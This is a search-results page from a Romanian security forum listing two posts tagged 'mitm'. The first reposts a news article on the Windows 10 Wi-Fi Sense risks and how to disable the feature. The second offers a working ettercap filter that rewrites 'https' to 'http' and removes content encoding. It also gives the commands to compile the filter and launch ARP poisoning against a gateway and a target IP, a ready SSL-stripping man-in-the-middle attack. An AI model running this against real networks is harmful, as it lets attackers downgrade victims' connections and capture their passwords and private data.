Jump to content

Search the Community

Showing results for tags 'mitm'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 2 results

  1. Just one day after Microsoft released its new operating system, over 14 Million Windows users upgraded their PCs to Windows 10. Of course, if you are one of the Millions, you should aware of Windows 10's Wi-Fi Sense feature that lets your friends automatically connects to your wireless network without providing the Wi-Fi password. Smells like a horrible Security Risk! It even triggered a firestorm among some security experts, who warned that Wi-Fi Sense is a terrible and dangerous feature and that you should disable it right away. Even some researchers advised Windows 10 users to rename their Wi-Fi access points. Before discussing the risks of Wi-Fi Sense, let's first know how it works. How Windows 10 Wi-Fi Sense works? Windows 10 Wi-Fi Sense feature allows you to share your Wi-Fi password with your friends or contacts, as well as lets you automatically connect to networks that your friends and acquaintances have connected to in past, even if you don't know the password. Now, when those friends are within the range of your Wi-Fi network, Windows 10 automatically joins the network with that saved password you just shared with your friends and logs them in, without prompting them for a password. Enabled by Default, but It's not the actual Security Threat, Here's Why: Wi-Fi Sense feature is enabled by default in Windows 10 to make it easier for users to receive instant access to the Shared Networks by their Friends or Contacts. But, But, But… did you notice that the feature says "For networks I select..."? "Enabled by default" doesn't mean your Wi-Fi passwords are automatically going to be shared with your Facebook or Skype contacts by default, unless you won’t manually configure your Wi-Fi Sense settings to share selected network access with any contact group. Under "For networks I select..." option, you can explicitly control which group of contacts from which social networks get access to which Wi-Fi Network. Until or unless you do not offer your Wi-Fi password to Wi-Fi Sense, it will not let selected contact group to connect to your network. This means Wi-Fi password sharing option is OFF for every social network by default. And of course even if you choose to share your Wi-Fi network with your contacts, Wi-Fi Sense only shares Internet access and not your actual Wi-Fi password. Why You Should be Scared of Wi-Fi Sense (Actual Security Threat) Microsoft promoted Wi-Fi sense as: In simple words, now you don't need to read out loud your Wi-Fi password, character by character when your friends are at your home and want to use The Internet. So similarly, you don’t need to shout across the office or your friend’s house "What’s the Wi-Fi password?" However: "If you choose to share with your Facebook friends, any of your Facebook friends who are using Wi-Fi Sense on a Windows Phone will be able to connect to the network you shared when it's in range, You can't pick and choose individual contacts." -- Microsoft FAQ says. As a general Internet user, I used to accept almost every friend request on the Facebook and also communicate with lots of people on Skype or Outlook. In short, the majority of people in my contact list are whom I don't know personally or trust. So, If I can't choose any individual contact from my list, then enabling "Network password sharing feature" will share my network access with all my contacts in the selected social network. Microsoft also Argued: Neither it allows anyone to access your local resources so that nobody can hunt through your personal files. However, We know that... The biggest threat of sharing your Wi-Fi access with everyone on a list is just like you are allowing hackers to position themselves between you and the connection point i.e. Man-in-the-Middle attack. In such attack scenarios, the hacker can access every piece of information you're sending out on the Internet, including important emails, account passwords or credit card information. Sitting on the same network, an attacker can also target your machine directly using Metasploit or any other hacking tool. Ultimately, Windows 10 Wi-Fi Sense probably is not the most secure feature in the world, but it is not that bad either, if in future, Microsoft could allow Windows 10 users to choose individual contacts from a group. For Now… Should You Stop Using It? Like many things in life, we have to make a choice between things that make our life comfortable and that provide us absolute security. AND, if you are concerned more about security, just turn Wi-Fi Sense OFF. How to Turn Windows 10 Wi-Fi Sense OFF? To disable Wi-Fi Sense, go to Windows Settings, then Network & Internet and then click "Change Wi-Fi settings," and then "Manage Wi-Fi settings." From there, you can change a variety of settings. Turn OFF everything under the Wi-Fi Sense heading; disable WI-Fi password sharing with Facebook, Outlook, or Skype; and have Wi-Fi Sense forget the list of known Wi-Fi networks. source: http://thehackernews.com/
  2. Just place it in HTTPS.FILTER, then compile it using "etterfilter" with the command : etterfilter https.filter -o https.ef Then You good to go with : ettercap -T -q -F https.ef -M ARP:remote /GATEWAY/ /TARGET_IP/ . ## # # This filter will substitute the word 'https' with 'http' on # both HTTP requests and responses. # # based on the discussion (and contained code) on forum thread # http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html # ## ########################## ## Zap Content Encoding ## ########################## if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("[HTTP Response Filter] Encoding zapped.\n"); } } ##################### ## Replace Content ## ##################### ## # Requests if (ip.proto == TCP && tcp.dst == 80) { # msg("[HTTP Response Filter] HTTP request seen.\n"); if (search(DECODED.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } if (search(DATA.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } } ## # Response if (ip.proto == TCP && tcp.src == 80) { # msg("[HTTP Response Filter] HTTP response seen.\n"); if (search(DECODED.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } if (search(DATA.data, "https")) { replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } } Source: I'M NASRO, I PENTEST ^^
×
×
  • Create New...